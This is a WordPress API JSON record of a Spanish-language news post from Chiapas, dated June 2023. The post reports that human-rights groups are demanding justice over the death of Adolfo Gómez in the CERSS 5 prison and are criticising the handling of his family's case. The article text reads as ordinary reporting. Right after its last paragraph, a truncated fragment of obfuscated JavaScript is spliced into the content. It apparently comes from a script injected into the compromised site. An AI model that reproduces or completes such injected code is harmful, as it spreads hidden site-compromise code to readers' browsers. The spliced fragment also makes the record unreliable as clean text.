{"id":10796,"date":"2023-06-30T03:56:35","date_gmt":"2023-06-30T03:56:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10796"},"modified":"2023-06-30T03:56:36","modified_gmt":"2023-06-30T03:56:36","slug":"piden-castigo-contra-funcionarios-del-cerss-5-por-muerte-de-adolfo-gomez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10796","title":{"rendered":"Piden castigo contra funcionarios del Cerss 5, por muerte de Adolfo G\u00f3mez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"259\" height=\"195\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-29-at-4.10.24-PM.jpeg\" alt=\"\" class=\"wp-image-10797\"\/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>29 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Integrantes de Colectiva Cereza y otras organizaciones defensoras de los derechos humanos, anunciaron que este viernes 30 de junio realizar\u00e1n conferencia de prensa a las 11 horas, en el Palacio de Gobierno, de la capital Tuxtla Guti\u00e9rrez, para exponer y denunciar violaciones y obst\u00e1culos para el acceso a la verdad y justicia de la familia G\u00f3mez, que desde hace tres a\u00f1os luchan penalmente contra personal de la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana.<\/p>\n\n\n\n<p>Patricia Aracil de Colectiva Cereza hizo llegar la invitaci\u00f3n a la conferencia de prensa, donde detalla que exigen justicia por la muerte en el Centro Estatal de Reinserci\u00f3n Social para Sentenciados n\u00famero 5 de Adolfo G\u00f3mez, originario de Chigt\u00f3n, donde adem\u00e1s otros 4 integrantes de su familia Josefa, Hortensia, Juana y Maribel fueron detenidas injustamente y se libraron otras 7 \u00f3rdenes de aprehensi\u00f3n, acusadas de la desaparici\u00f3n del ni\u00f1o Dylan en 2020.<\/p>\n\n\n\n<p>\u201cTambi\u00e9n 22 ni\u00f1os fueron separados de su familia y retenidos en el DIF por la FGE que quiso usarlos contra sus madres y abuelos y que hasta la fecha presentan consecuencias emocionales de aquella situaci\u00f3n. Exigimos independencia y garant\u00eda de los derechos de las v\u00edctimas por parte de la juez Martha Patricia Maldonado Utrilla, ya que el \u00faltimo Acuerdo judicial muestra una l\u00ednea de actuaci\u00f3n a favor de los imputados de SSyPC\u201d.<\/p>\n\n\n\n<p>Asimismo, piden a Guillermo Ramos P\u00e9rez, magistrado Presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, se haga justicia, ya que el 4 de julio a las 16 horas, en el Juzgado del Ramo Penal para la Atenci\u00f3n de Delitos No Graves de Chiapa, Cintalapa y Tuxtla \u201cEl Canelo\u201d, se llevar\u00e1 a cabo Audiencia Intermedia por la responsabilidad y complicidad de ex funcionarios del CERSS no. 5, en el homicidio de Adolfo G\u00f3mez G\u00f3mez.<\/p>\n\n\n\n<p>\u201cPedimos su intervenci\u00f3n para que se garantice la independencia judicial de la Juzgadora y act\u00fae conforme a derecho. Cesen las acciones para favorecer a la Fiscal\u00eda y realmente represente la b\u00fasqueda por la verdad y la justicia, abandonando posturas a favor de los inculpados. Se abra la audiencia intermedia y se resuelva el incidente de nulidad absoluta promovido por las co-asesoras jur\u00eddicas.<\/p>\n\n\n\n<p>Que el homicidio de Adolfo G\u00f3mez G\u00f3mez, asesinado al encontrarse injustamente preso en el CERSS 5, no quede impune y su caso sirva para tomar las medidas necesarias para que la tortura y dem\u00e1s violaciones a Derechos Humanos, cesen como pr\u00e1cticas recurrentes de los polic\u00edas y fiscales\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 29 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Integrantes de Colectiva Cereza y otras organizaciones defensoras de los derechos humanos, anunciaron que este viernes 30 de junio realizar\u00e1n conferencia de prensa a las 11 horas, en el Palacio de Gobierno, de la capital Tuxtla Guti\u00e9rrez, para exponer y denunciar violaciones y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10797,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10796","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10796","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10796"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10796\/revisions"}],"predecessor-version":[{"id":10798,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10796\/revisions\/10798"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10797"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10796"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10796"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10796"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}